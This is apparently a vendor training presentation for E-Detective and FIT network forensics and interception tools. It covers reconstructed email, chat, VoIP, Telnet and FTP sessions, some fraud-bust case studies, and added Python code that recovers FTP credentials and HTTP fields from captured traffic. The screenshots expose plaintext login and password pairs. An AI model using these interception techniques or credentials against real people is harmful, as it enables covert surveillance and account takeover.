     --  2008-09-22 09:48:54  192.168.1.33   youtube.com    (Chinese title)                    http://tw.youtube.com/watch?v=X3_VPQhlyno&NR=1                     2.60M
     --  2008-09-22 09:46:53  192.168.1.33   203.66.48.36   (illegible)                        http://203.66.48.36/youtube/1/4e7N5Ppkr7g?ivit=8033&original...    2.41M
     --  2008-09-22 09:46:53  192.168.1.33   youtube.com    (illegible)                        http://tw.youtube.com/watch?v=4e7N5Ppkr7g&NR=1                     2.41M
     --  2008-09-22 09:46:15  192.168.1.33   (illegible)    (illegible)                        http://203.66.48.100/youtube/4/w3i8cVwNMKkE?ivit=8005&origina...   984.61K
Pager: Total 37, Total Page 5, Current Page 1. An embedded player (position 00:10) replays the extracted FLV file.


Sample: Telnet


[Screenshot: E-Detective web console, case "default", tab TELNET.]

Listing columns: No. | Date-Time | Account | User | Password | Server | Record File (size)
(Telnet carries the whole session, including the login, unencrypted; two rows show terminal control-sequence residue ([B[B[B..., OBOBOB...) in the User column where keystrokes other than a login name were typed.)
    guest           --        140.112.172.11
    guest           --        140.113.17.154
    [B[B[B...       --        140.112.172.11
    ...decisionboss jmyohxbc  140.112.172.11
    OBOBOB...       --        140.112.172.11
    guest           --        140.113.30.91
    lafa188         lafa1965  140.112.172.11
    new             yes       140.112.172.11
Record file sizes shown: 4.62K, 22.68K, 38.62K, 95.75K, 4.89K, 32.31K, 121.37K, 189.66K. Pager: Total 13, Total Page 2, Current Page 1.

Replay window for TELNET_85621bcb0e41c8c9.dat with First / Previous / Next / Last / Bookmark navigation and Play / Fast controls (the browser shows a Certificate Error for the console's HTTPS address).


Sample: VoIP SIP/H.323 RTP Voice Calls 


[Screenshot: E-Detective web console, case "default", tab VOIP, with an "Upload" button beside the tab.]

Listing columns: NO. | Date-Time | Account | Caller | Callee | Mode | Type | Codec | File Name | Time
    12  (illegible)  192.168.6.8     8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_hyFW9c.wav  8 Sec
    11  (illegible)  60.250.163.131  8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_bvidJi.wav  8 Sec
    10  (illegible)  192.168.6.8     8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_ItPNjo.wav  8 Sec
     9  (illegible)  60.250.163.131  8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_x00mWt.wav  9 Sec
     8  (illegible)  192.168.6.8     8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_M5JSAz.wav  10 Sec
     7  (illegible)  60.250.163.131  8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_....wav     11 Sec
     6  2009-06-11   192.168.6.8     8610044407  8610000104  peer to peer  SIP  G723.1  VOIP_ew6d6K.wav  8 Sec
     5  (illegible)  ...                                                                ..._XSQ.wav      8 Sec
Pager: Total Page 2, Current Page 1.

Overlay: File Download dialog for the reconstructed call audio (Name: 8610044407_8610000104.wav, Type: Wave Sound, 556 bytes, From: 192.168.1.12) with the usual Internet Explorer warning text.


Sample: HTTPS/SSL Traffic 


[Screenshot: E-Detective web console, case "default", tab SSL.]

Listing columns: No | Date-Time | Account | Client-IP | Server-IP | Port | File Name | Bytes
All visible rows: 2009-06-18, Account 192.168.1.11, Client-IP 192.168.1.11, Server-IP 192.168.1.200, Port 443, 2.75K each; file names
    SSL_ENC_3232235787_43203_1245299812_1245301317
    SSL_ENC_3232235787_43189_1245299802_1245301317
    SSL_ENC_3232235787_43187_1245299792_1245301317
    SSL_ENC_3232235787_43184_1245299782_1245301317
    SSL_ENC_3232235787_43179_1245299772_1245301317
    SSL_ENC_3232235787_43177_1245299762_1245301317
    SSL_ENC_3232235787_43175_1245299752_1245301317
    SSL_ENC_3232235787_43173_1245299742_1245301317
(The name fields appear to be the client IP as a 32-bit decimal, 3232235787 = 192.168.1.11, the client port, and start and end Unix timestamps, both falling on 2009-06-18.)
Pager: Total 11,185, Total Page 1,399, Current Page 1.

"Upload Key File" dialog: Certificate File: [ ] Upload.
SSL Private Key is required to decrypt the SSL encrypted content.


User Management Features 


[Screenshot: E-Detective web console, User Management page. Menu bar: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout.]

User table columns: Group | User | Authority | Date-Time | Function
    N/A              admin            Admin        2009-03-20 11:40:56  Modify Password | Modify Authority | Modify Priority | Case Visibility
    N/A              decision1        Analyst      2009-06-19 15:46:49  Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility
    N/A              decision2        Analyst      2009-06-19 15:50:15  Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility
    default          default          Group Admin  2009-03-20 11:40:56  Delete | Modify Password | Modify Priority | Case Visibility
    default          decision_user1   User         2009-06-19 15:50:40  Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility
    decision_group1  decision_group1  Group Admin  2009-06-19 15:51:41  Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility
Roles in use: Admin, Group Admin, Analyst, User. Visible Case List panel: Case Name | Read | Write | Modify.

Create New User form: * Authority (N/A) | * User ID | * Password | * Confirm Password | * Priority (normal) | Submit
note : * is the required field


Case Management Features 


[Screenshot: E-Detective web console, Case Management page. Menu bar: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout.]

Case table columns: Creation Date-Time | Group | Case Name | Creator | Path | Function
    2009-03-20 11:40:56  default          default  admin  (path illegible)                   Delete | Modify Priority | Imported Record | Query Result
    2009-06-19 16:11:13  decision_group1  Case1    admin  /datas/rawdata_import/cases/d...   Delete | Clear | Modify | Modify Priority | Imported Record | Query Result
    2009-06-19 16:11:27  decision_group1  Case2    admin  /datas/rawdata_import/cases/d...   Delete | Clear | Modify | Modify Priority | Imported Record | Query Result
Raw Data Imported History / Raw Data Imported List panels, columns: Date-Time | User | Case Name | Tag Name | File Delete | File Date-Time | File Source | Import File.

Create New Case form: * Case Name | * Case Path Name | * Group | * Priority (normal) | Submit
Note : * is the required field


Importing PCAP for Analysis & Reconstruction 


[Screenshot: E-Detective web console, Import Analysis page.]

File Source: Group default, Case default, Path: /datas/rawdata_import/cases/default/default/
Columns: [checkbox] | File Name | File Date-Time | File Size | Function
    HTTP_VIDEO_METACAFE.pcap  2009-06-16 09:55:55  2.0MB
    HTTP_VIDEO_YOUTUBE.pcap   2009-06-16 09:53:02  8.4MB
    SAMPLE.pcap               2008-07-02 10:47:25  (size illegible)
    raw_1                     2008-10-13 09:45:26  12MB
    raw_10                    2008-10-13 09:47:44  2.9MB
    raw_11                    2008-10-13 09:48:04  1.4MB
    raw_12                    2008-10-13 09:48:16  14MB
    raw_13                    2008-10-13 09:48:26  1.2MB
    raw_14                    2008-10-13 09:48:32  2.2MB
    raw_15                    2008-10-13 09:48:36  284KB
    raw_16                    2008-10-13 09:48:40  1.4MB
    raw_17                    2008-10-13 09:48:46  4.3MB
    raw_18                    2008-10-13 09:48:50  8.1MB
    raw_19                    2008-10-13 09:48:56  7.0MB
    raw_2                     2008-10-13 09:45:44  5.7MB
    raw_20                    2008-10-13 09:49:04  87MB
    raw_21                    2008-10-13 09:49:12  76KB
    raw_22                    2008-10-13 09:49:16  476KB   Delete | Name
Below the list: Tag Name: 2009-06-19 16:17:17 | File-Time: From [ ] To [ ] | Analyze Log


Reconstructed Data Export/Backup 


[Screenshot: E-Detective web console, case "default", "Build Backup ISO" dialog opened from the Case Results toolbar.]

CATEGORY checkboxes: ALL; POP3, SMTP, IMAP; Webmail (Read), Webmail (Sent); MSN, (illegible), YAHOO, (illegible), UT Chatroom, SKYPE; GOOGLETALK, IRC, IRC Chatroom; FTP, P2P; Online Game; HTTP Link, HTTP Content, HTTP Upload/Download, HTTP Reconstruct, Video Stream; Telnet; VoIP; SSL.


System Setup


[Screenshot: E-Detective web console, System Setup page. Menu bar: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout. Sub-menu: Network Setup / System Backup / Port Setting / Update System Time / System Reboot/PowerOff / Upgrade / Registration. "Screen will refresh 14 s".]

Job Queue columns: Job ID | Date/Time | Priority | Subject | Owner | Function
    23  2009-06-19 16:37:17  (illegible)  Export in Case : default  admin
Pager: Total Page 1, Current Page 1.

Job Subject : Export in Case : default
Job Status (log lines, repeated once per second while the export runs):
    030 2009-06-19 16:38:05 INFO DECODING  eddc_mkexport : Backup starting - 18 %
    030 2009-06-19 16:38:05 INFO DECODING  eddc_mkexport : Backup starting - 18 %
    030 2009-06-19 16:38:06 INFO DECODING  eddc_mkexport : Backup starting - 18 %
    (same line repeated six more times at 16:38:06)

Offline Packet Reconstruction Series 
Forensics Investigation Toolkit (FIT) 


Introduction to Forensics Investigation Toolkit (FIT) 


Offline Raw Data Files (PCAP) Decoding and Reconstruction Tool (Academic Version also Available) 


Solution for: 
* Internet & Network Traffic Content Analysis (Network Administrator) 
* Auditing of Internet & Network Traffic (Network Administrator) 
* Network Forensics Analysis and Investigation (Government & LEA) 


Forensics Investigation Toolkit (FIT) is a Windows-based application suitable for all groups of users to analyze and forensically investigate the content of captured Internet/network raw data files. 


Compatible with: Windows XP, Windows Vista, Windows 7 


Forensics Investigation Toolkit Application 


[Diagram: Internet raw data in PCAP format, from a LAN capture (ex: eth0..123..pcap, eth0..456..pcap) or a wireless capture (ex: wifi0..123..pcap, wifi0..456..pcap), is loaded into the Forensics Investigation Toolkit application (compatible with Windows XP / Vista / 7) for Internet Content Analysis and Reconstruction; the reconstructed results are reviewed by Administrators / Officers.] 


Sample: Email (POP3, SMTP and IMAP) 


[Screenshot: Network Forensics Analysis Toolkit (FIT) window. Menu: File | Edit | View | Case Management | Tool | Window | Help. Left tree: E-Mail (POP3 [33], IMAP [6], SMTP, WebMail(Send) [47]); CHAT (MSN [3], ICQ [1], YAHOO [3], (illegible) [1], UT Chatroom [1], GoogleTalk [2]). Open tabs: POP3, SMTP.]

Listing columns: [checkbox] | Datetime | Source IP | Source MAC | Destination IP | Sender | Receiver | CC | Subject | Body Size
    11/5/2009 5:34:54 PM   192.168.1.10   00:0e:a6:55:ec:c9  139.175.252.15   (illegible)   vic@deci...   Bandwidth Monito...
    11/5/2009 5:34:54 PM   192.168.1.10   00:0e:a6:55:ec:c9  139.175.252.15   decision...   vic@deci...   Fwd: ...test
    11/5/2009 5:34:54 PM   192.168.1.10   00:0e:a6:55:ec:c9  139.175.252.15   decision...   vic@deci...   Fwd: ...
    11/5/2009 5:34:54 PM   192.168.1.10   00:0e:a6:55:ec:c9  139.175.252.15   rickwang...   vic@deci...   [Bug 2287] ...
    9/10/2009 11:11:56 AM  192.168.1.190  00:0a:e4:0d:c0:d8  220.130.119.240  decision_...  decision1...  Hi, This is a test ...  (this row repeated seven times, body sizes 1,82.. / 48 / 5 / 57 ...)

Detailed Information pane (tabs: Detail | Content | Whois | Source Code). Mail Server's address: 220.130.119.240, with Hostname Query | Whois | Google Map buttons. Selected message: "Hi, This is a test mail 38!" from decision_test@yam.com, 2009/09/10 (Thursday) 11:... The Source Code tab shows the raw headers:
    Return-Path: <decision_test@yam.com>
    X-Original-To: decision123@pchome.com.tw
    Delivered-To: decision123@pchome.com.tw
    Received: from mx18.pchome.com.tw (mx16.pchome.com.tw [220.130.119.229])
        by ms64.pchome.com.tw (Postfix) with ESMTP id 662CODCS569024
        for <decision123@pchome.com.tw>; Wed, 9 Sep 2009 17:13:55 +0800 (CST)
    Received: from localhost (localhost [127.0.0.1])
        (remaining header lines illegible)


Sample: Webmail — Yahoo Mail, Gmail, Hotmail etc.

[Screenshot: Network Forensics Analysis Toolkit, WebMail Received view. Columns: Captured Time, Source IP, Source MAC, Destination IP, Sender, Receiver, CC, Subject; rows captured 11/2/2009 from 192.168.1.202 (00:0A:E4:0D:C0:D8) to 72.14.203.18. Detailed Information for the selected message: a LinkedIn welcome mail ("Welcome to LinkedIn!") received by decisioner@gmail.com on 2009/11/02 (Monday) 10:03, Web Mail Server's IP Address 72.14.203.18, Web Mail Server's Hostname mail.google.com, each with Hostname Query / Whois / Google Map buttons, and the reconstructed HTML of the message under the Detail / Content / Whois / Source Code tabs.]
Sample: IM — Yahoo, MSN, ICQ, IRC, QQ etc.

[Screenshot: MSN view under CHAT (tree: MSN, YAHOO, UT Chatroom, GoogleTalk, IRC Chatroom, File Transfer). Columns: Captured Time, Source IP, Source MAC, Destination IP, Chat Session Owner, Participator; Destination IP is shown as 0.0.0.0 for the relayed sessions. Detailed Information for a session captured 2009/06/15 (Monday) 14:02 with Chat Session Owner decision_test@hotmail.com and participator diesis@ms62.hinet.net: a timestamped transcript (2:03:53 PM to 2:06:07 PM) of the exchanged messages, including text, a file transfer, video messages and a voice call.]
Sample: File Transfer — FTP Upload/Download

[Screenshot: FTP view. Columns: Captured Time, Source MAC, Source IP, Destination IP, Transferred File, Size; rows captured 6/15/2009 from 192.168.1.33 (00:0e:a6:39:47:43) to 192.168.1.249, transferring DiagnosticCD_ED2-1-10-2.iso (16197612 and 15695696 bytes). Detailed Information: captured 2009/06/15 (Monday) 15:21, Source MAC, User's IP Address 192.168.1.33, FTP Server's IP Address 192.168.1.249, and FTP Login Password 203154, recovered verbatim because the FTP control channel sends USER and PASS unencrypted.]
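The detail pane above shows the login password next to the transferred file because the FTP control channel (RFC 959) carries USER and PASS, the PASV/PORT data-port negotiation and every RETR/STOR as plain text. The following is an added example, not code from the original deck or the vendor's product, that reconstructs those fields from a direction-tagged control-channel transcript: the credentials and whether the login succeeded, the data port each transfer used (p1*256+p2 from the 227 reply in passive mode, or from the client's PORT command in active mode), the file name, the size the server announces in its 150 reply (a common server habit, not guaranteed), and whether the transfer completed. The transcript is constructed, reusing the file name and password from the screenshot; the banner, user name and second transfer are invented.

```python
"""Reconstruct an FTP control session: credentials, data ports and transfers."""
import re

_PASV_REPLY = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")   # 227 h1,h2,h3,h4,p1,p2
_SIZE_HINT = re.compile(r"\((\d+) bytes\)")                             # common 150 reply wording


def parse_ftp_control(lines):
    """Walk direction-tagged control-channel lines ("C" client, "S" server) in capture order.

    Returns the login (USER/PASS travel in the clear) and one entry per RETR/STOR with the
    negotiated data port, the announced size (if any) and the final status.
    """
    rec = {"user": None, "password": None, "login_ok": None, "transfers": []}
    data_port = None      # port negotiated for the next data connection
    last_verb = None      # client command the next reply answers
    pending = None        # transfer started by RETR/STOR awaiting 226 or an error
    for direction, text in lines:
        text = text.rstrip("\r\n")
        if direction == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                rec["user"] = arg
            elif verb == "PASS":
                rec["password"] = arg
            elif verb == "PORT":                              # active mode: client listens
                p = arg.split(",")
                data_port = int(p[4]) * 256 + int(p[5])
            elif verb in ("RETR", "STOR", "STOU", "APPE"):
                pending = {"type": "Download" if verb == "RETR" else "Upload",
                           "file": arg, "data_port": data_port, "size": None, "status": None}
            last_verb = verb
            continue
        code = text[:3]
        if not code.isdigit() or text[3:4] == "-":            # continuation of a multi-line reply
            continue
        if last_verb == "PASS" and code in ("230", "530"):
            rec["login_ok"] = code == "230"
        elif code == "227":                                   # passive mode: server listens
            m = _PASV_REPLY.search(text)
            if m:
                data_port = int(m.group(5)) * 256 + int(m.group(6))
        elif pending is not None:
            if code == "150":                                 # data connection opened
                m = _SIZE_HINT.search(text)
                if m:
                    pending["size"] = int(m.group(1))
            elif code == "226":                               # transfer finished
                pending["status"] = "complete"
                rec["transfers"].append(pending)
                pending = None
            elif code[0] in "45":                             # refused or aborted
                pending["status"] = "failed " + code
                rec["transfers"].append(pending)
                pending = None
    return rec


# Constructed sample transcript (not captured traffic); file name and password mirror
# the screenshot, everything else is invented.
SAMPLE_FTP = [
    ("S", "220 FTP server ready.\r\n"),
    ("C", "USER ed\r\n"),
    ("S", "331 Please specify the password.\r\n"),
    ("C", "PASS 203154\r\n"),
    ("S", "230 Login successful.\r\n"),
    ("C", "TYPE I\r\n"),
    ("S", "200 Switching to Binary mode.\r\n"),
    ("C", "PASV\r\n"),
    ("S", "227 Entering Passive Mode (192,168,1,249,63,28)\r\n"),
    ("C", "RETR DiagnosticCD_ED2-1-10-2.iso\r\n"),
    ("S", "150 Opening BINARY mode data connection for DiagnosticCD_ED2-1-10-2.iso (16197612 bytes).\r\n"),
    ("S", "226 File send OK.\r\n"),
    ("C", "PASV\r\n"),
    ("S", "227 Entering Passive Mode (192,168,1,249,63,29)\r\n"),
    ("C", "STOR report.zip\r\n"),
    ("S", "550 Permission denied.\r\n"),
    ("C", "QUIT\r\n"),
    ("S", "221 Goodbye.\r\n"),
]

if __name__ == "__main__":
    print(parse_ftp_control(SAMPLE_FTP))
```

The data port is what lets a capture tool pair the control session with the data connection that actually carried the file; in passive mode the address in the 227 reply may differ from the server's real IP behind NAT, so key the lookup on the port and the client address rather than on the advertised host bytes.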


Sample: File Transfer — P2P File Sharing

[Screenshot: P2P view. Columns: Captured Time, Source MAC, Source IP, Destination IP, Last Activated Time, P2P Tool, Transferred File; rows from 192.168.1.190 (00:0a:e4:0d:c0:d8) on 9/10/2009 and 10/30/2009 using Foxy 1.9.8.0 (files Foxy.1.9.9.TC.Setup and an MP3 of Jay-Z, Rihanna and Kanye) and BitTorrent (file Not Available); Destination IP is 0.0.0.0 because a swarm has no single remote end. Detailed Information for a Foxy 1.9.8.0 session captured 2009/09/10 (Thursday) 11:26, last activated 11:26: the transferred file, an MP3 of Beyoncé feat. Jay-Z, "Deja Vu", and a peer table (Source Port, Destination IP, Destination Port, bytes transferred) listing the remote peers, with Message / Detail / Whois tabs.]
Sample: HTTP (Content)

[Screenshot: HTTP Content view (Web Browsing), tree: TELNET, HTTP (HTTP Content [580], HTTP Upload/Download, Video Stream [6], Http Request [4310]), Other. Columns: Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host, Charset, Label of Web Page; rows captured 6/15/2009 3:31 PM from 192.168.1.190 to tw.yahoo.com (119.160.246.241), ad.yieldmanager.com (124.108.103.241, label UNKNOWN), ca.yahoo.com ("Yahoo! Canada") and ca.news.yahoo.com (68.180.150.199, labels taken from the page titles), all UTF-8. Detailed Information: captured 2009/06/15 (Monday) 15:31, User's IP Address 192.168.1.190, Web Server's IP Address 119.160.246.241, Web Server's Hostname tw.yahoo.com, with Hostname Query / Whois / Google Map buttons; the Source Code tab shows the reconstructed page (meta Content-Type "text/html; charset=utf-8", the <title>, and the inline YAHOO namespace and cookie scripts).]
Sample: HTTP Upload/Download

[Screenshot: HTTP Upload/Download view. Columns: Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host, Transferred File; rows captured 6/15/2009: 192.168.1.33 (00:0E:A6:39:47:43) to www.wowtaiwan.com.tw (203.66.142.57), file name beginning "Launcher"; 192.168.1.190 (00:0A:E4:0D:C0:D8) to www.mystercrowley.com (217.20.127.141), file Ejector_v1.0.zip; and to www.citadel5.com and www.jps-development.com (208.109.138.6), file gscalcBD.zip. Detailed Information: captured 2009/06/15 (Monday) 16:32, Source MAC 00:0E:A6:39:47:43, Source IP 192.168.1.33, Destination IP 203.66.142.57, Web Server's Host www.wowtaiwan.com.tw, TYPE: Download, Transferred File "Launcher..." (truncated), with Hostname Query / Whois / Google Map buttons.]
Sample: HTTP Video Streaming (FLV Format)

[Screenshot: Video Stream view. Columns: Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host, Transferred File; rows captured 11/2/2009 (192.168.1.10 to pic.adver.com.tw) and 6/15/2009 (192.168.1.190 to 203.66.48.38, 203.66.48.40 and 203.66.48.45), each stream saved as an FLV file named HTTPVIDEO_....flv. Detailed Information: Web Server's Host pic.adver.com.tw, Transferred File HTTPVIDEO_sXaaaa.flv, Detail / Whois tabs and an embedded player for the reconstructed video.]
HTTP Request

[Screenshot: Http Request view. Columns: Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host; rows captured 6/15/2009 from 192.168.1.33 (00:0E:A6:39:47:43) to www.wowtaiwan.com.tw (203.66.142.57) and from 192.168.1.190 (00:0A:E4:0D:C0:D8) to relay.google.com (72.14.203.104), tw.yahoo.com (119.160.246.241) and ad.yieldmanager.com (124.108.103.241). Detailed Information: User's IP Address 192.168.1.33, Web Server's IP Address 203.66.142.57, Web Server's Hostname www.wowtaiwan.com.tw, with Hostname Query / Whois / Google Map buttons, and the reconstructed page source (meta Content-Type charset=utf-8, <title>, YAHOO namespace script) under the Source Code tab.]
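The HTTP Content, HTTP Upload/Download and HTTP Request views above all derive their columns from one reassembled request/response pair. The following is an added example, not code from the original deck or from the vendor's product, showing how those columns are produced: Web Server's Host and the URL from the Host header and request target; Charset from the Content-Type header, falling back to the page's own <meta> tag when the header omits it (as the Yahoo page in the screenshot does); Label of Web Page from the <title> decoded with that charset; and TYPE, Download when the response is a non-text body or a Content-Disposition attachment, Upload when the request is a multipart/form-data POST carrying a filename. The three exchanges are constructed samples; tw.yahoo.com and the file name Ejector_v1.0.zip are reused from the screenshots, www.example.com and the upload are placeholders.

```python
"""Derive the HTTP list-view fields from one reassembled request/response pair."""
import re

_CHARSET = re.compile(rb"charset=[\"']?([A-Za-z0-9_-]+)", re.I)
_TITLE = re.compile(rb"<title[^>]*>(.*?)</title>", re.I | re.S)
_FILENAME = re.compile(r"filename=\"?([^\";\r\n]+)\"?", re.I)


def split_message(raw):
    """Split one HTTP message into (start line, {lower-cased name: value}, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def page_charset(headers, body):
    """Charset from the Content-Type header, falling back to a <meta> tag in the body."""
    m = _CHARSET.search(headers.get("content-type", "").encode("latin-1"))
    if m is None:
        m = _CHARSET.search(body[:4096])               # the <meta> tag sits in <head>
    return m.group(1).decode("latin-1").upper() if m else "UNKNOWN"


def page_label(body, charset):
    """The <title>, decoded with the page's declared charset (the 'Label of Web Page')."""
    m = _TITLE.search(body)
    if m is None:
        return "UNKNOWN"
    try:
        return m.group(1).decode(charset, errors="replace").strip()
    except LookupError:                                 # unknown/absent charset: 1:1 fallback
        return m.group(1).decode("latin-1").strip()


def reconstruct_http(request, response):
    """Classify one exchange as Content, Upload or Download and fill the list columns."""
    req_line, req_h, req_body = split_message(request)
    status_line, resp_h, resp_body = split_message(response)
    method, target, _ = req_line.split(" ", 2)
    host = req_h.get("host", "")
    rec = {"host": host, "method": method, "url": "http://" + host + target,
           "status": int(status_line.split(" ", 2)[1]),
           "type": "Content", "file": None, "charset": "", "label": ""}
    req_ctype = req_h.get("content-type", "").lower()
    resp_ctype = resp_h.get("content-type", "").lower()
    disposition = resp_h.get("content-disposition", "")
    if method == "POST" and req_ctype.startswith("multipart/form-data"):
        m = _FILENAME.search(req_body.decode("latin-1"))   # the part that carries a file
        rec.update(type="Upload", file=m.group(1) if m else None)
    elif "attachment" in disposition.lower() or not resp_ctype.startswith("text/"):
        m = _FILENAME.search(disposition)
        path_name = target.split("?", 1)[0].rsplit("/", 1)[-1]
        rec.update(type="Download", file=m.group(1) if m else (path_name or None))
    else:
        rec["charset"] = page_charset(resp_h, resp_body)
        rec["label"] = page_label(resp_body, rec["charset"])
    return rec


# Constructed sample exchanges (not captured traffic); bodies cut to the minimum.
PAGE_REQ = (b"GET /index.html HTTP/1.1\r\nHost: tw.yahoo.com\r\n"
            b"User-Agent: Mozilla/5.0\r\n\r\n")
PAGE_RESP = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"        # no charset here
             b"<html><head><meta http-equiv=\"Content-Type\" "
             b"content=\"text/html; charset=utf-8\">"
             b"<title>Yahoo!\xe5\xa5\x87\xe6\x91\xa9</title></head><body></body></html>")
DL_REQ = b"GET /files/Ejector_v1.0.zip HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
DL_RESP = (b"HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n"
           b"Content-Length: 4\r\n\r\nPK\x03\x04")
UP_REQ = (b"POST /upload HTTP/1.1\r\nHost: www.example.com\r\n"
          b"Content-Type: multipart/form-data; boundary=XX\r\n\r\n"
          b"--XX\r\nContent-Disposition: form-data; name=\"f\"; "
          b"filename=\"pricelist.xls\"\r\nContent-Type: application/octet-stream\r\n\r\n"
          b"\x00\x01\r\n--XX--\r\n")
UP_RESP = b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nstored\r\n"

if __name__ == "__main__":
    for req, resp in ((PAGE_REQ, PAGE_RESP), (DL_REQ, DL_RESP), (UP_REQ, UP_RESP)):
        print(reconstruct_http(req, resp))
```

Decoding the title with the page's own charset is what separates a readable label ("Yahoo!奇摩") from the mojibake visible in the screenshot's list; when neither header nor <meta> declares one, the code labels the charset UNKNOWN and falls back to a byte-for-byte decode rather than guessing.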


Free Text Search — Key Words Content Search

[Screenshot: result list for a keyword query, with the protocol tree on the left (E-Mail: POP3 [33], WebMail(Send) [47]; CHAT: MSN [3], ...). Columns: Captured Time, Source IP, Source MAC, Destination IP, Sender, Receiver, CC, Subject; the matching rows are captured 9/10/2009 11:11:56 AM from 192.168.1.190 to 220.130.119.240. Detailed Information for the selected hit, with Content / Whois / Source Code tabs: Subject "Hi, This is a test mail 38!", Sender decision_test@yam.com, Receiver decision123@pchome.com.tw, Datetime 2009/09/10 (Thursday) 11:11, Source MAC 00:0a:e4:0d:c0:d8, Source IP 192.168.1.190, Destination IP 220.130.119.240.]

Free Text Search — Search by Key Words


Cyber Crime Investigation and Some Case Studies


Globalized Crime Issue

The borderless Internet makes criminal behaviour more globalized. Through the Internet and cloud computing, communication within a swindler group can be both faster and anonymous. Because of the limits of state jurisdiction and this anonymity, it is very hard for state prosecutors and police to investigate the entire range of a group's criminal activities.


[Figure: map of a swindler group operating across Taiwan, China/HK, Thailand, Vietnam, South Korea, Japan and North America. Note on the figure: Cloud Computing = Network Computing; through the Internet, computers can cooperate with each other, and services are available farther afield.]


Challenges faced

* With new technologies (such as IP phones) it is hard to intercept calls with existing equipment. We need professionals and suppliers to find a way out.

* Hard to find the foreign proxy or router used as a jump board: look for cross-border cooperation, or for other related clues if there is no cooperation. Criminals using a VPN or a foreign proxy as a jump board may be hidden deeper in the Internet.

* Large volume of CDR (call detail records), and hard to analyze: analyze the data and find the key information by text mining and data warehousing. CDR exists for the ISP's billing management, so we must find out how the calls are being made and analyze the reason.

* Hard to track calls made with dummy accounts: find the source and the links, and get to the key point with technical assistance and help from

Gap between Physical and Cyber Crimes

[Diagram: For physical crimes, police work from finance records, interviews (video), CDR and lawful interception (LI), and informers, towards a human target (apprehend, arrest) and a place (warrant, confiscate). For cyber crimes, the crime side (web or tool) and the non-crime side (social network) first have to be handled by collection and IP tracking by account before the same finance records, CDR and LI lead to a person or a place. Caption: "Different sources dealt with by police: hard to get a clue (don't know how to do it), and no way to trace!"]

Biggest Case:
450 Nabbed in Largest Taiwan-China Fraud Bust

[Screenshot: Channel NewsAsia (Asia Pacific News) article "450 nabbed in largest Taiwan-China fraud bust", 2010, shown in a browser; site navigation omitted.]

TAIPEI: About 450 people were arrested in Taiwan and China Wednesday in the largest joint anti-fraud operation launched by the two sides, the island's police said.

More than 2,700 Chinese policemen and nearly 550 from Taiwan took part in coordinated raids against scam rings on both sides of the Taiwan Strait, said the Criminal Investigation Bureau in Taipei.

Taiwan police arrested 121 suspects and confiscated more than 10 million Taiwan dollars (312,500 US) while 329 were rounded up by Chinese authorities, according to the bureau.

"This is the largest-ever joint operation to show our determination to fight crime," the bureau said in a statement.

"Let this be a warning to criminal groups thinking they can get away by moving back and forth across the Taiwan Strait."

According to the bureau, the suspects were accused of involvement in a variety of fraud schemes, including telephone and on-line auction scams, in which people paid money for goods they never received.

In a different type of scam, they allegedly assumed fake identities such as prosecutors, judges or police officers, apparently to get people to reveal their bank account details.

Taiwan and China, which split in 1949 after a civil war, signed a joint crime-fighting and judicial assistance agreement last year amid improving ties.

-AFP/wk

http://www.channelnewsasia.com/stories/afp_asiapacific/view/1077084/1/.html


[Screenshots: the same bust as reported in Chinese by the Central News Agency (http://www.cna.com.tw/ShowNews/Detail.aspx?pNewsID=201008250245&pType0=aCN&pTyp, URL truncated) and by Taiwan News (taiwannews.com.tw, news id 1356491, published 2010-08-25 07:09 PM), shown in a browser; the Chinese article text is not legible in the capture.]


450 Nabbed in Largest Taiwan-China Fraud Bust

* The suspects were accused of involvement in a variety of fraud schemes, including telephone and on-line auction scams, in which people paid money for goods they never received.

* In a different type of scam, they allegedly assumed fake identities such as prosecutors, judges or police officers, apparently to get people to reveal their bank account details.

* E-Detective systems are deployed in multiple locations in China and Taiwan to help the operation track the suspects and preserve the evidence.

http://www.channelnewsasia.com/stories/afp_asiapacific/view/1077084/1/.html
Using E-Detective to Track Suspects

Playback of reconstructed VoIP file

E-Detective Other Reference Cases 2
[Screenshot: news article "Police arrest 99 from Taiwan, China for fraud"; the sidebar of unrelated Vietnamese headlines is omitted.]

Ministry of Security police have arrested and charged 99 people from China and Taiwan in an international phone and Internet fraud scam that has fleeced (sentence cut off in the screenshot)

The arrestees, 76 from Taiwan and 23 from China, were placed in custody between June 29 and July 6, police said.

On July 7, Major General Nguyen Duc Minh said Vietnam would extradite the arrestees because they have not turned up any Vietnamese victims. The international crew targeted Chinese banks and citizens, mostly in Jiangsu, Anhui and Shanghai, he said.
E-Detective Other Reference Cases 3

* Company staff are caught sending valuable confidential information to rivals.

* The information sent out includes a confidential price list, tender information and a contact database.

* It is sent through personal e-mail (Yahoo Mail, Gmail etc.) and through IM (Yahoo Messenger, Windows Live Messenger etc.).

* E-Detective is used to monitor staff online behaviour, retain and preserve all Internet communication, and protect the company's confidential information and intellectual property.
Thank You!
Training & Practice is Key to Success!

Presented by Decision Group

decision@decision.com.tw
www.edecision4u.com


